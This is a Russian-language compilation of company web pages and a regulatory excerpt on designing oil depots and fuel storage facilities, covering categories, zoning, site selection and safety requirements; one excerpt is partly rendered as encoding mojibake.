Проектирование нефтебаз и складов нефтепродуктов

Промышленное проектирование

Нефтебаза и склады ГСМ являются обязательным комплексом сооружений в составе предприятий, профильный вид деятельности которых – добыча и переработка и дальнейшее использование нефти и нефтепродуктов, обеспечение всех видов транспортного сообщения.

Что такое склад ГСМ

и нефтебаза?

  • Нефтебаза ― это промышленный объект, предназначенный для хранения готовых нефтепродуктов и нефти, как правило, состоящий из металлических резервуаров наземного или подземного расположения и оснащенный соответствующей инфраструктурой для приема и отгрузки хранящихся жидкостей в емкости для транспортировки (железнодорожные и автоцистерны и танкеры) или непосредственно в нефтепровод.
  • Склад ГСМ ― это комплекс конструкций и сооружений различного назначения и подземных/надземных резервуаров для организации приемки, переработки и хранения топлива, масел и прочих горючих жидкостей.
  • Ключевым этапом в проектировании нефтебаз и складов ГСМ является тщательная первоначальная проработка инфраструктуры объекта:
  • грамотное размещение конструкций, предназначенных для приема, технологической переработки, хранения нефтепродуктов;
  • расположение оборудования для контроля качества топлива и масел;
  • планировка транспортно-перегрузочной развязки;
  • обеспечение соблюдения всех требований для обеспечения безопасности как людей, так и окружающей среды.

Нефтебаза и склад ГСМ в Нижнем Новгороде

Учитывая специфику работы объектов, проектирование складов ГСМ и нефтебаз выполняется с обеспечением противопожарной безопасности, которая предусматривает наличие пожарной сигнализации, датчиков для контроля температуры и давления в емкостях и резервуаров с водой для тушения огня, а также с соблюдением санитарно-гигиенических норм, включающих охрану труда и окружающей среды.

Имеем все необходимые разрешения, сертификаты и лицензии на ведение проектной деятельности

Посмотреть

Процесс проектирования

Компания «КСВ проект» осуществляет проектирование нефтебаз и складов горюче-смазочных материалов, отвечающих стандартам конструктивной надежности и безопасности. Репутацию надежного партнера нашей компании подтверждает более чем 20-летний опыт успешного проектирования складов ГСМ и нефтебаз.

Подготовку эскиз-проекта склада горюче-смазочных материалов мы осуществляем с учетом всех норм проектирования, которые предъявляются к объектам данного типа. На этом этапе проекта склада ГСМ нами выполняется общее деление объекта на части (районирование), для этого необходимо:

  • проанализировать расстояние до ближайших построек;
  • разбить территории на зоны (приемочную с допуском транспорта и зону хранения нефтепродуктов и топлива);
  • спланировать расположение контрольной лаборатории, ремонтного цеха, котельной, пожарных резервуаров;
  • выполнить топографическую съемку территории и предварительное ТЭО (технико-экономическое обоснование) и разделение инженерных сетей на местности.

На данном этапе подготавливается план-схема наземных и подземных конструкций, определяется тип резервуаров (горизонтальные или вертикальные, одно- или многокамерные и т.д.), на основании планируемого грузопотока рассчитывается количество емкостей, размеры всех площадок, стеллажей, навесов, гаражей.

Особое внимание мы уделяем созданию схемы движения транспортных средств по территории склада ГСМ – допуск автомобильного и железнодорожного транспорта в конкретную зону определяется с учетом эргономики.

В процессе проектирования складов ГСМ мы предусматриваем конструктивный расчет особенностей инфраструктурных объектов склада с учетом сейсмического пояса.

К устойчивости и крепежу резервуаров для горюче-смазочных материалов предъявляются особые требования, а материал, из которого они изготовлены, должен иметь низкую теплопроводность, выдерживать давление, быть устойчивым к перепадам температур).

Рассчитывая нагрузку на фундамент, мы учитываем полную загрузку емкостей с применением поправочного коэффициента. Трубопроводы, предназначенные для транспортировки нефтепродуктов и ГСМ, должны выдерживать нагрузку, соответствующую плотности перекачиваемого продукта. Количество этажей в наших проектах рассчитывается в соответствии с нормами СНиП.

Мы выполняем проектирование инженерных сетей, предусматривая организацию безопасной транспортировки ГСМ и нефтепродуктов, обеспечение взрыво- и пожаробезопасность (наличие средств для оперативной локализации возгорания).

Охлаждение цистерн обеспечивается циркуляцией воды, а электропроводка прокладывается согласно регламенту о расстояниях до легковоспламеняющихся веществ. Очистные сооружения и дренаж способствуют защите окружающей среды и экологии.

Организация циркуляции воды для охлаждения цистерн, прокладка электропроводки осуществляется с учетом соблюдения норм расстояний до легковоспламеняющихся веществ.

Задайте вопрос ведущему специалисту и получите бесплатную консультацию

Задать вопрос

Чернов Алексей Главный инженер проектов

Выполненные проекты

Многолетний опыт работы «КСВ проект», штат высококвалифицированных инженеров, сотрудничество с надзорными органами позволяет нам осуществлять проектирование складов нефти, нефтепродуктов и ГСМ качественно и в сроки, предусмотренные договором.

  • 100% проектов получили положительное заключение вневедомственной экспертизы
  • 120 выполненных проектов складов ГСМ и нефтебаз за 20 лет работы
  • до 30% снижаем затраты на энергоресурсы
  • на 30% сокращаем затраты на обслуживание энергосетей
  • Индивидуальный тепловой пункт мощностью 1651,46 кВт
  • Индивидуальный тепловой пункт мощностью 318 кВт
  • Индивидуальный тепловой пункт мощностью 102 кВт
  • Индивидуальный тепловой пункт мощностью 1,7 МВт
  • Блочный тепловой пункт мощностью 2008,5 кВт
  • Блочный тепловой пункт мощностью 2008,5 кВт
  • Блочно-модульная котельная, мощностью 9 Мвт, топливо – природный газ
  • Блочно-модульная котельная, мощностью 1,4 Мвт, топливо – диатермическое масло
  • Проектирование топливного трубопровода и модульного склада дизельного топлива для котельной 5,7 МВт.
  • Разработка SCADA системы для котельной мощностью 126, 42 Гкал/час на базе InduSoft Web Studio 8.0
  • Прокладка наружного газопровода от границы земельного участка до отдельно стоящей блочно-модульной водогрейной котельной (9,05 МВт).
  • Контейнерная АЗС с резервуаром V=15 м3
  • Конденсационный теплоутилизатор для глубокой утилизации тепла уходящих дымовых газов котлов ПТВМ-120 ТЭЦ
  • Термомасляная котельная мощностью 3 МВт
  • Блочно-модульная водогрейная котельная установленной теплопроизводительностью 6 МВт и инженерные сети.
  • Энергоцентр установленной электрической мощностью 2,0МВт, тепловой мощностью 10,65МВт в две очереди строительства г. Лосино-Петровский
  • Проект реконструкции, капитального ремонта существующих и строительства новых объектов нефтебазы г. Певек
  • Проект перевооружения нефтебазы — установка четырех новых вертикальных стальных резервуаров марки РВС-5000. г. Певек
  • Проектирование оборудования границ блоков газораздаточной станции цеха быстродействующей отсечной арматурой с дистанционным управлением г. Москва
  • Автоматизированная установка налива в герметически закрытой системе с аварийным сливом и с установкой регенерации паров (УРПУ, 9 цистерн на одном пути) г. Москва

Наши преимущества

Более 20 лет наша компания оказывает услуги по комплексному проектированию, проектированию инженерных систем, а также разработке и внедрению АСУ ТП на различных промышленных объектах, таких как: химические и нефтехимические предприятия, склады ГСМ и нефтебазы, сливно-наливные эстакады, резервуарные парки, различные объекты энергетики.

Комплексный подход

Разработаем эскиз-проект, готовим проектную и рабочую документацию, получаем разрешение на строительство после прохождения экспертизы и согласования в надзорных органах.

Соблюдение законодательства

Мы руководствуемся действующими нормативными документами, строго придерживаясь всех правил современного промышленного проектирования без нарушения законов РФ.

Быстрое согласование проекта

Получаем положительные заключения и необходимые разрешения в максимально сжатые сроки благодаря длительному тесному сотрудничеству с согласующими инстанциями.

Квалифицированный персонал

Штат нашей компании составляет команда высококвалифицированных инженеров, которые имеют обширный опыт профессиональной деятельности и регулярно проходят специальное обучение, совершенствуя свои знания, умения и навыки.

Современные технологии

Применение новейших компьютерных программ, таких как EPLAN, SCAD Office, AutoCad, ПК ГрандСмета, ТехЭксперт, позволяют оптимизировать процесс проектирования и выполнить его на высоком профессиональном уровне.

Минимизация затрат

Используем корректные проектные решения, которые включают грамотные планировки и подбор материалов и на практике показали себя как наилучшие и самые выгодные, что позволяет уменьшить затраты на строительство и эксплуатацию объекта.

Заявка на расчет проекта

Отправьте нам заявку для расчета проекта онлайн или просто позвоните по телефону

+7 (495) 132-04-74

Источник: https://ksvpro.ru/project/oil/

Нормы проектирования нефтебаз и складов нефтепродуктов

Госгортехнадзор России постановляет:

1. Утвердить «РџСЂР°РІРёР»Р° промышленной безопасности нефтебаз Рё складов нефтепродуктов».

  • 2.
  • Направить «РџСЂР°РІРёР»Р° промышленной безопасности нефтебаз Рё складов нефтепродуктов» РЅР° государственную регистрацию РІ Министерство юстиции Р РѕСЃСЃРёР№СЃРєРѕР№ Федерации.
  • Начальник Госгортехнадзора Р РѕСЃСЃРёРё

РџР‘ 09-560-03

Ответственные разработчики:

П.П. Коптев, Н.С. Борисов, С.Г. Савушкин, А.А. Шаталов, Т.А. Селиванова, М.Н. Кривов, К.Н. Шеин

Р’ разработке настоящих правил принимали участие специалисты: РћРћРћ «РќРµС„техиминформатика» РїСЂРё участии Управления РїРѕ надзору РІ химической, нефтехимической Рё нефтеперерабатывающей промышленности, специалистов организаций РћРђРћ «Р›РµРЅРіРёРїСЂРѕРЅРµС„техим», РћРђРћ «Р’РќР�РџР�нефть», РђРћ «РќРµС„техимпроект» (Рі. Санкт-Петербург), Р РђРћ «Р•Р­РЎ Р РѕСЃСЃРёРё», РћРћРћ «Р›СѓРєРѕР№Р»-Калининградморнефть», ГПР� Рё РќР�Р� ГА «РђСЌСЂРѕРїСЂРѕРµРєС‚», РђРћ фирма «РћР Р“Р Р­РЎ», РћРђРћ «Р›РЈРљРћР™Р›», Тюменской нефтяной компании.

Настоящие Правила разработаны в соответствии с Федеральным законом от 21.07.

97 № 116-ФЗ «О промышленной безопасности опасных производственных объектов», Положением о Федеральном горном и промышленной надзоре России, Общими правилами промышленной безопасности для организаций, осуществляющих деятельность в области промышленной безопасности опасных производственных объектов, и предназначены для применения всеми организациями независимо от их организационно-правовых форм и форм собственности, осуществляющими деятельность в области промышленной безопасности.

Настоящие Правила устанавливают требования, соблюдение которых направлено на обеспечение промышленной безопасности, предупреждение аварий, несчастных случаев на опасных производственных объектах (ОПО) нефтебаз и складов нефтепродуктов с учетом специфики объектов хранения нефти и нефтепродуктов и достигнутого современного технического уровня.

I. Общие положения

1.1.

Настоящие Правила промышленной безопасности нефтебаз Рё складов нефтепродуктов (далее — Правила) устанавливают требования, соблюдение которых направлено РЅР° обеспечение промышленной безопасности, предупреждение аварий, несчастных случаев РЅР° опасных производственных объектах нефтебаз Рё складов нефтепродуктов.

Источник: http://firenotes.ru/x_pravila/pb-09-560-03/pb-09-560-03_a.html

Нормы проектирования складов нефти и нефтепродуктов по СНИП

  1. Хранение нефти и побочных продуктов нефтедобывающей промышленности является одним из наиболее сложных в складском хозяйстве, так как оно всегда сопряжено с большим риском возникновения пожаров или взрыва при их неосторожном контакте с объектом окружающей среды, кислородом или друг с другом.

Источник: https://center-avtomatiki.com/normy-proektirovaniya-neftebaz-i-skladov-nefteproduktov/

Проектирование нефтебаз

ООО «КХМ-проект»  предлагает услуги по разработке проектов на строительство новых и реконструкцию существующих нефтебаз, нефтегазохранилищ, складов ГСМ и т.д.

Также предлагаем разработка специальных разделов проекта:

  • охрана труда и управления производством, — сметы и организация строительства, — ИТМ гражданской обороны, мероприятия по предупреждению чрезвычайных ситуаций,- охрана окружающей среды, оценка воздействия на окружающую среду проектируемых и действующих объектов;
  • выполнение расчетов и разработка норм предельнодопустимых выбросов (сбросов) загрязняющих веществ в окружающую среду, размещение отходов;
  • осуществление функций генпроектировщика;
  • инжиниринговые услуги.

Нефтебаза — это комплекс зданий, сооружений и устройств для приёма, хранения, перегрузки с одного вида транспорта на другой и отпуска нефти и нефтепродуктов. Различают перевалочные, призаводские и распределительные нефтебазы. Перевалочные нефтебазы предназначены для перегрузки с одного вида транспорта на другой или на тот же вид транспорта: из морских танкеров и барж в речные, из ж.-д. маршрутов в отдельные цистерны и т.п. Призаводские нефтебазы бывают сырьевые (приём, хранение сырья, подлежащего переработке, подготовка его к переработке) и товарные (приём нефтепродуктов с установок, хранение нефтепродуктов и отгрузка). Как правило, сырьевые и товарные нефтебазы объединяются в одно хозяйство, располагаемое на территории, общей с заводом, или в непосредственной близости от него. Распределительные нефтебазы снабжают непосредственно предприятия, а также отпускают нефтепродукты в мелкой таре. Формально они делятся на областные, районные, железнодорожные, водно-железнодорожные, водные, трубопроводные и глубинные. Нефтебазы этого типа имеют ограниченный район действия, ёмкость резервуарного парка их сравнительно небольшая. Многие нефтебазы одновременно выполняют смешанные функции — перевалочных, заводских и распределительных. Проектирование таких нефтебаз выполняет огромную роль в дальнейшем функционировании базы

  • Для объектов хранения и перевалки нефтепродуктов можно сформулировать список выполняемых проектных работ: 
  • 1) Проектирование нефтебаз (нефтехранилищ);  2) Проектирование товарно-сырьевых парков промышленных предприятий (призаводских нефтебаз);  3) Проектирование морских перевалочных нефтебаз, нефтяных терминалов;  4) Разработка проектов расходных складов нефтепродуктов небольшой мощности;  5) Проектирование нестандартных баз хранения ГСМ, например с подземными резервуарами (для гражданских и военных стратегических объектов и северных территорий);  6) Разработка документации на замену и модернизацию технологического оборудования действующих нефтебаз;  7) Разработка проектной документации на реконструкцию и расширение резервуарных парков действующих нефтебаз;  8) Приведение систем пожарной и промышленной безопасности нефтебаз к современным стандартам и требованиям НТД; 
  • 9) Проектирование отдельных систем и объектов: сливо-наливных эстакад, резервуарных парков, систем противопожарной защиты, систем автоматики и автоматизации; 
  • Классификация нефтебаз
  1. Условно все нефтебазы можно разделить на две группы.
  2. К первой группе относятся нефтебазы, являющиеся самостоятельными предприятиями, а также товарно-транспортные и сырьевые цеха нефтяных промыслов, нефтеперерабатывающих заводов и магистральных трубопроводов, располагающих мощным резервуарным парком (более 2000 м3).

Ко второй группе относятся нефтебазы, входящие в состав предприятий и имеющие общий объем резервуарного парка для хранения легкоиспаряющихся нефтепродуктов не превышающий 2000 м3. Такая классификация использовалась согласно нормам, действовавшим в 1970г. 

Согласно современных норм, нефтебазы подразделяются: 

  • По общей вместимости и максимальному объему одного резервуара — на категории, в соответствии со СНиП 2.11.03-93; 
  • По функциональному назначению — на перевалочные, перевалочно-распределительные и распределительные; 
  • По транспортным связям поступления и отгрузки нефтепродуктов — на железнодорожные, водные (морские, речные), трубопроводные, автомобильные, а также смешанные водно-железнодорожные, трубопроводно-железнодорожные и т.п.); 
  • По номенклатуре хранимых нефтепродуктов — на нефтебазы для легковоспламеняющихся и горючих нефтепродуктов, а также нефтебазы общего хранения; 
  • По годовому грузообороту — на пять классов в соответствии с таблицей ВНТП 5-95. 

Общая характеристика нефтебаз По значимости, проводимые на нефтебазе операции, делятся на основные и вспомогательные.  К основным операциям относятся такие как:  1) Прием нефтепродуктов, доставляемых на нефтебазу в железнодорожных вагонах, нефтеналивных судах, по магистральным нефтепроводам, автомобильным и воздушным транспортом и в мелкой таре (контейнерах, бочках);  2) Хранение нефтепродуктов в резервуарах и в тарных хранилищах;  3) Отгрузка нефтепродуктов и нефтей по железной дороге, автомобильным, водным и трубопроводным транспортом;  4) Компаундирование (от англ. Compound – составной, смешанный, смешение) нефтепродуктов.  К вспомогательным операциям относятся:  1) Очистка и обезвоживание нефтепродуктов;  2) Строительство нефтебаз;  3) Ремонт технологического оборудования, зданий и сооружений;  4) Эксплуатация энергетических установок и транспортных средств.  Объемы основных и вспомогательных операций зависят от категории нефтебазы и программы их производственной деятельности.  В целях организации четкого и бесперебойного проведения всех операций, а также из соображений противопожарной безопасности все объекты нефтебаз распределены по зонам.  Зона железнодорожных операций включает сооружения для погрузки и разгрузки нефтепродуктов и нефтей. В этой зоне размещаются: железнодорожные подъездные пути, сливо-наливные эстакады, насосные для перекачки нефтепродуктов, операторная для обслуживающего персонала эстакады.  Зона водных нефтегрузовых операций включает сооружения для погрузки и разгрузки нефтепродуктов, перевозимых водным транспортом. В этой зоне размещаются: морские и речные грузовые пристани (пирсы и причалы), насосные, береговые резервуарные парки, технологические трубопроводы, операторные.  Зона хранения представлена следующими объектами: резервуарными парками, технологическими трубопроводами, насосными, операторными.  Зона оперативная, в которой производится отпуск нефтепродуктов мелкими партиями в автоцистерны, контейнеры и бочки, имеет: автоэстакады для налива нефтепродуктов в автоцистерны, разливочные для налива нефтепродуктов в бочки, склады для затаренных нефтепродуктов, лаборатория для анализа качества нефтепродуктов, тарные склады и пр.  Зона вспомогательных сооружений, предназначенных для обслуживания нефтебазы, включает: механическую мастерскую, котельную, электростанцию или трансформаторную подстанцию, цех по производству и ремонту нефтяной тары, водопроводные и сантехнические сооружения, материальный склад, топливный склад для нужд нефтебазы, объекты противопожарной службы.  Зона административно-хозяйственная, в которую могут входить: контора нефтебазы, пожарное депо, здание охраны нефтебазы, гараж. 

Зона очистных сооружений, может включать: нефтеловушку для отделения нефтепродуктов от воды, насосную при нефтеловушке, блочные очистные сооружения.

Источник: http://kxm-p.ru/Design/Projectnfb

Особенности проектирования нефтебаз и складов нефтепродуктов

Предприятия, которые занимаются химической или топливной промышленностью часто заказывают проектирование нефтебаз и складов нефтепродуктов. Это нужно для того, чтобы создать некий запас химических или других веществ, которые применяются производителем.

В каких случаях понадобится

Если компания имеет в своем распоряжении склады для нефти и других истекающих продуктов, то у нее появляется большое количество дополнительных возможностей:

  • стоимость хозяйственных процессов значительно уменьшается;
  • руководство компании может оптимизировать процесс круговорота химических продуктов внутри предприятия;
  • сокращается стоимость погрузочных и разгрузочных работ;
  • больше не возникает перебоев с поставками нефтепродуктов;
  • нивелируется влияние цены нефти на цену выпускаемого продукта;
  • нет больше надобности брать в аренду цистерны или другие емкости;
  • необходимые условия хранения нефти позволяют контролировать ее химическое и физическое состояние;
  • руководителям предприятия становится легче проводить перекачивание и учет нефтепродуктов.

Что из себя представляют

Склад нефти и нефтепродуктов – это целый ряд зданий, которые образовывают целый комплекс помещений для целенаправленного использования. Его употребляют для приема, хранения химических продуктов, а также их переработки и контроля качества. Оттуда продукт направляется на разные заправки и установки для топлива.

Нефтебаза – это тот же склад нефтепродуктов, который оборудован устройствами для приема, хранения перезагрузки с одного транспортного средства на другое. Нефтебазы бывают: перевалочные, распределительные и призаводские. Функции у каждого из этих типов различаются.

Если на перевалочных складах происходит перегрузка топлива из одного средства на другое, то распределительные занимаются отгрузкой продукта в предприятия.

Призаводские склады нефтепродуктов расположены на территории предприятия и исполняют роль хранилища для химических веществ.

Требования к документации

Для проектирования нефтебаз и складов нефтепродуктов нужно приготовить и правильно оформить проект. Он должен во всех аспектах отвечать всем параметрам безопасности и учитывать все технические особенности строения:

  • должна быть установлена максимально допустимая вместительность (для наземного хранения – не более 10-20 тысяч кубических метров, для подземных – 20-40 тысяч кубических метров);
  • на территории хранилища должны быть установлены противопожарные средства;
  • проект должен учитывать правила расположения емкостей для хранения нефтепродуктов (не выше 20 сантиметров над поверхностью склада и не ближе 3 метров от ближайшего здания).

Правильно спроектированные нефтебазы или склады нефтепродуктов должны отвечать требованиям нормативных документов. Только в таких случаях они будут служить долго и эффективно, а их владельцы будут получать прибыль от их использования.

Похожая продукция:

Источник: http://evrotekhservis.ru/osobennosti-proektirovaniya-neftebaz-i-skladov-nefteproduktov/

Проектирование нефтебаз

ООО “ЭРЗ” осуществляет проектирование нефтебаз всех категорий, групп и видов.

Мы профессионально проектируем:

  • перевалочные нефтебазы и нефтехранилища, устраиваемые в целях перевалки продукта с одного вида транспорта на другой;
  • распределительные нефтебазы, принимающие продукты морским, речным, ж/д или автомобильным транспортом для последующей отгрузки потребителям (как правило, автоцистернами и в мелкой фасовке);
  • хранилища нефтепродуктов;
  • призаводские нефтебазы, устраиваемых на предприятии для хранения сырья и готовой продукции;
  • Морские терминалы, переваливающие нефтепродукты;
  • Нефтебазы при насосных станциях магистральных нефтепродуктопроводов;
  • Глубинные нефтебазы и нефтехранилища, устраиваемые в удаленных районах, принимающие нефтепродукты автоцистернами или воздушным транспортом;
  • Подземных хранилищ ГСМ.

Также разрабатываем проектную и рабочую документацию, когда планируется реконструкция нефтебаз, их техническое перевооружение, модернизация или расширение. В качестве отдельной специализции осуществляем проектирование резервуарных парков.

При проектировании складов нефтепродуктов необходимо учитывать их категорийность, устанавливаемую Правилами технической эксплуатации нефтебаз (утв. приказом Минэнерго РФ от 19 июня 2003 г. N 232).

Категорийность нефтебаз по вместимости

Категория Общая вместимость, м³ Максимальный объем одного резервуара, м³
I  более 100’000м
II  от 20’000 до 100’000
IIIа  от 10’000 до 20’000  5’000
IIIб  от 2’000 до 10’000  2’000
IIIв  до 2’000  700

При определении категории нефтехранилища, нефтебазы по общей вместимости учитываются номинальные объемы только резервуаров хранения нефтепродуктов, без расходных емкостей, дренажных резервуаров и т.д.

Когда создается проект нефтебазы, ее категория очень важна, поскольку именно она будет влиять на то, будет ли она учитываться как Особо опасный производственный объект, или нет согласно Градостроительному кодексу РФ.

Также нефтебазы делятся на 5 групп по показателю готового грузооборота.

Группа Годовой грузооборот, тонн
1 более 500’000
2  от 100’000 до 500’000
3  от 50’000 до 100’000
4 от 20’000 до 50’000
5  до 20’000

Проект нефтебазы описывает основные структурные зоны, на которые делятся практически все предприятия по обеспечению нефтепродуктами.

  1. Зона железнодорожных операций, в которой при проектировании нефтебазы размещается технологический комплекс для приема (и, в некоторых случаях, отгрузки) нефтепродуктов железнодорожным транспортом. Комплекс состоит из ж/д путей, сливо-наливной эстакады, вспомогательного оборудования, системы КИПиА и операторного пункта.
  2. Зона водных операций (для морских и речных нефтехранилищ), в которой проектом нефтебазы предусматривается оборудование для приема / отгрузки нефтепродуктов баржами, танкерами и прочим водным транспортом. В него входят причальные сооружения, стендеры, насосные группы, резервуарные парки при береговой линии, вспомогательное оборудование, автоматики и операторной.
  3. Зона складирования нефтепродуктов – резервуарный парк, насосные группы, трубопроводная обвязка, обвалование.
  4. Оперативная зона отпуска нефтепродуктов потребителям. Как правило, предприятия по обеспечению нефтепродуктами оборудуются комплексом для налива автомобильных цистерн и цехом по фасовке продукта в мелкую тару. Также при проектировании нефтебаз в данной зоне часто располагают лаборатории контроля качества и склады для фасовки.
  5. Зона вспомогательных объектов. В ней размещают электрические подстанции, ремонтные мастерские склады, котельные, сантехнические и противопожарные объекты.
  6. Зона очистных сооружений – для очистки вод от нефтесодержащих примесей.
  7. Административно-хозяйственная зона предприятия по обеспечению нефтепродуктами, состоящая из зданий для размещения персонала, пожарных депо, пунктов охраны и т.д.

Определение участка под строительство нефтебазы

Перед тем, как начать проектирование складов нефтепродуктов, выбираются участки их будущего размещения, то есть проектирование нефтебазы будет вестись в привязке к конкретной местности.

Естественно, участок, на котором будет расположена нефтебаза, должен быть выгодно расположен с точки зрения маркетинга и логистики.

Здесь учитывается близость потребителей, конкурентное окружение, транспортная инфраструктура района, удобство подъезда и т.д.

При этом, чтобы выбрать оптимальный участок и избежать значительных затрат (как инвестиционных, так и эксплуатационных), нужно учесть целую систему инженерных требований, которым он должен соответствовать.

Из самых общих примеров таких требований можно указать:

  • Учет окружения участка – до начала разработки проекта нефтебазы необходимо убедиться, что отводимая территория имеет необходимые разрывы между границами участка и соседними сооружениями.
  • Учет геологических и гидрогеологических условий. Например, если есть возможность выбрать площадку, сложенную из коренных грунтовых пород, способных выдержать нагрузку от 0,1 МПа, существенно снизится бюджет на устройство фундаментов, особенно под резервуары. Напротив, если участок заболоченный или затапливаемый, потребуются серьезные инвестиции в дренажные работы, возведение дамб и т.д. При этом, заливаемость участка может быть подземной, и ее не обнаружишь визуально. И таких примеров масса.
  • Учет гидрометеорологических условий. На нашей практике многие инвесторы, не привлекающие специалистов в проектировании складов нефтепродуктов на этапе выбора площадки, в последующем сталкиваются с массой проблем в области пожарной и экологической безопасности. К примеру, участок должен быть расположен с наветренной стороны по отношению к жилым массивам и промышленным объектам, поскольку не допускается отнесение паров нефтепродуктов не относились на жилые дома, объекты с открытым огнем. Чтобы не допустить развитие огня при утечке нефтепродуктов, нефтехранилища, располагающиеся на реках, должны находиться ниже от населённых пунктов и пожароопасных объектов, переправ и пристаней по течению реки.
  • Учет энергообеспеченности. На участке или около него должны располагаться источники электроэнергии и водоснабжения для обеспечения производственно-хозяйственных и противопожарных нужд. На участке будущего предприятия по обеспечению нефтепродуктами должен быть удобный слив для осадков и канализационных вод в целях безопасности окружающих населённых пунктов. Наличие вблизи складов строительных материалов также является преимуществом. 

Ключевые разделы проекта нефтебазы

К проекту нефтебазы прилагается Генплан, на котором отображено расположение объектов на застраиваемом участке. Составляют генеральный план учитывая местный рельеф, геологическое строение выбранной территории, климатические особенности.

Во время выполнения проектных работ также учитывают номенклатуру нефтепродуктов, и противопожарные условия, инфраструктуру объекта и многое другое.

На этом этапе проектирования нефтебаз в первую очередь используют топографическую основу – ситуационный план с железнодорожными путями, автомагистралями и коммуникациями, внешними системами водоснабжения и электроснабжения. На плане площадки выполняют построение розы ветров и сетки координат.

С помощью плана нефтебазы связывают со всеми транспортными путями и сетями данной территории. Железнодорожные тупики должны быть проведены с правильным радиусом и уклоном и примыкать к магистралям в наиболее удобных местах.

Привязав сети размещают сооружения по 7-ми зонам. Оперативная зона обычно располагается для быстроты вблизи входа и въезда в базу. Поскольку самой опасной считается зона хранения, ее располагают дальше всего, и отделяют, разрешая доступ небольшому количеству людей.

Также опасной считается зона вспомогательных сооружений из-за производства работ с использованием огня, поэтому ее тоже отделяют. Зону очистных сооружений располагают в пониженном рельефе для отвода лишней воды в нефтеловушку от накопившихся осадков и производственных стоков.

Трубопроводы и технологические сети компонуют с максимальным приближением к объектам. Ориентируясь по сторонам света и направлению ветров планируют расположение объектов в зонах нефтехранилища.

Так пожароопасные объекты (такие, как, например, котельные) размещают в стороне, где ветер сдувает искры в противоположном направлении от производственных зон, резервуарных парков и разливочных.

При проектировании нефтебаз после горизонтальной планировки территории размещают объекты на плане. Сооружениям задают координаты 1-го из углов, помечают их габаритные размеры. Для вертикальной планировки территории нефтебазы соблюдают следующие требования:

  • Обеспечивают слив и налив ж/д цистерн и тар самотеком,
  • Трубопроводы по территории нефтехранилища прокладывают без изгибов.
  • Создают условия для хорошего всасывания группы насосов.

Имея на руках готовый Генплан переходят с составлению схем трубопроводной системы нефтебазы, что, в свою очередь, послужит основой для гидравлического расчета трубопровода.

Следующий этап проектирования складов нефтепродуктов – разработка технологической схемы. ТС – это отображение сети трубопроводов, перекачивающих нефтепродукты.

Для составления схемы важно знать последовательность и объем проводимых операций по приему и подаче нефтепродукта, перечень хранимых нефтепродуктов на нефтебазе.

Также учитывается необходимость осуществления перекачки нефтепродуктов внутри нефтехранилища между резервуарами.

Далее на Генплан наносят Технологическую схему и получают Технологический план. На плане для сети трубопроводов составляют отдельные профили трассы, в которых отмечают линии поверхности земли и нахождение трубопровода.

В профили отображают наличие насосных групп, колодцев. Указывают отметки земной поверхности, и точки трассы. Также точки трассы отмечают пикетами через сто метров, и через каждый километр столбами.

Рассчитанный уклон трубопровода выдерживают в заданных параметрах.

На основе профилей высчитывают количество будущих земляных работ, можно посчитать нефтепродукт, оставшийся в резервуаре, можно узнать о наличии образовавшихся мешков, которые мешают прохождению продукта по трубопроводу.

В проекте нефтебазы особое место уделяют противопожарной безопасности и экологической защите. В этих целях при проектировании нефтебаз учитываются климатические условия местности, расположение объекта относительно отдаленности от города и источников воды.

В зависимости от “розы ветров” жилой комплекс и производственные помещения базы располагают с поветренной стороны для защиты от пожароопасной ситуации. Проект нефтебазы выполняется с соблюдением всех экологических требований.

Учитываются выделения вредных и загрязняющих веществ, производят расчет, который зависит от количества хранимого нефтепродукта, номенклатуры, и других показателей. На основе этих данных и учитывая уровень фона загрязнения получают разрешительную документацию.

Полный состав проекта нефтебазы

При проектировании нефтебаз необходимо руководствоваться Постановлением Правительства РФ от 16 февраля 2008 г. N 87 “О составе разделов проектной документации и требованиях к их содержанию”.

В зависимости от категорийности будущего объекта и от того, какие работы будут проводиться – реконструкция нефтебазы, ее техническое перевооружение или же новое строительство – количество разделов проекта может разниться.

Если проект нефтебазы будет проходить Главгосэкспертизу – проект нефтебазы должен будет содержать все предусмотренные Постановлением 12 разделов.

Если экспертизу Промбезопасности – количество разделов может быть сокращено в порядке, предусмотренном Градостроительным кодексом.

Источник: http://enrz.ru/proektirovanie/proektirovanie-neftebaz/

Проектирование нефтебаз

Предприятия химической, топливной и ряда других видов промышленности заказывают услугу проектирования нефтебазы для создания необходимого запаса химических веществ, применяемых в производственной деятельности в значительных объемах. Имея в своем распоряжении вместительное хранилище нефти, нефтепродуктов или горюче-смазочных материалов, компания приобретает реальную возможность: 

  • Снизить себестоимость хозяйственных операций;
  • Оптимизировать процесс перемещения химических продуктов внутри предприятия;
  • Обеспечить высокую эффективность погрузочно-разгрузочных работ при одновременном сокращении их стоимости;
  • Исключить перебои в работе из-за срыва поставщиком сроков поставки нефти и ГСМ;
  • Снизить степень влияния роста цен на нефть и ее производные на себестоимость выпускаемой продукции и оказываемых услуг;
  • Отказаться от сотрудничества с предприятиями, предлагающими емкости в долгосрочную аренду;
  • Полностью контролировать физико-химическое состояние нефти и ГСМ, создав оптимальные условия для их хранения и недопущения возникновения аварийных ситуаций. 

Чтобы запущенная в эксплуатацию нефтебаза полностью соответствовала своему назначению и обеспечивала эффективное и безопасное хранение продуктов переработки нефти, ее проектирование осуществляется на основе действующего нормативного документа СНиП 2.11.03-93, регламентирующего состав и содержание пакета проектной документации. 

Соблюдение всех его требований – гарантия:

  • Продолжительной и безопасной эксплуатации нефтебазы или склада ГСМ;
  • Снижения до нуля риска вреда для окружающей среды;
  • Создания оптимальных условий использования нефтепродуктов, с сокращением их естественных потерь;
  • Успешного согласования проекта в вышестоящих организациях, для оперативного начала строительно-монтажных работ;
  • Производительности работы специалистов, привлеченных к обустройству места хранения нефти, нефтепродуктов и горюче-смазочных материалов.  

 

Проектирование нефтебаз: основные требования к содержанию документации 

Чтобы готовый проект был утвержден к реализации и отвечал основным параметрам надежности безопасности, его разработка должна учитывать следующие моменты:

  • Максимальная вместимость складов не должна превышать предельно допустимого уровня: для наземного хранения горючих и легковоспламеняющихся материалов – не более 10 000 и 2 000куб.м. соответственно, для подземного хранения – не более 20 000 и 4 000куб. м;
  • Обязательное обустройство и постоянное наличие на площадке средств противопожарной защиты  и защиты окружающей среды;
  • Проектирование зданий и сооружений для нефтебазы должно учитывать соответствие их I, II или  IIIа классам огнестойкости;
  • Расчет вместимости осуществляется только на основании объема основных резервуаров, тогда как вспомогательные и резервные емкости не рассматриваются в качестве составляющих, определяющих номинальную вместимость хранилища;
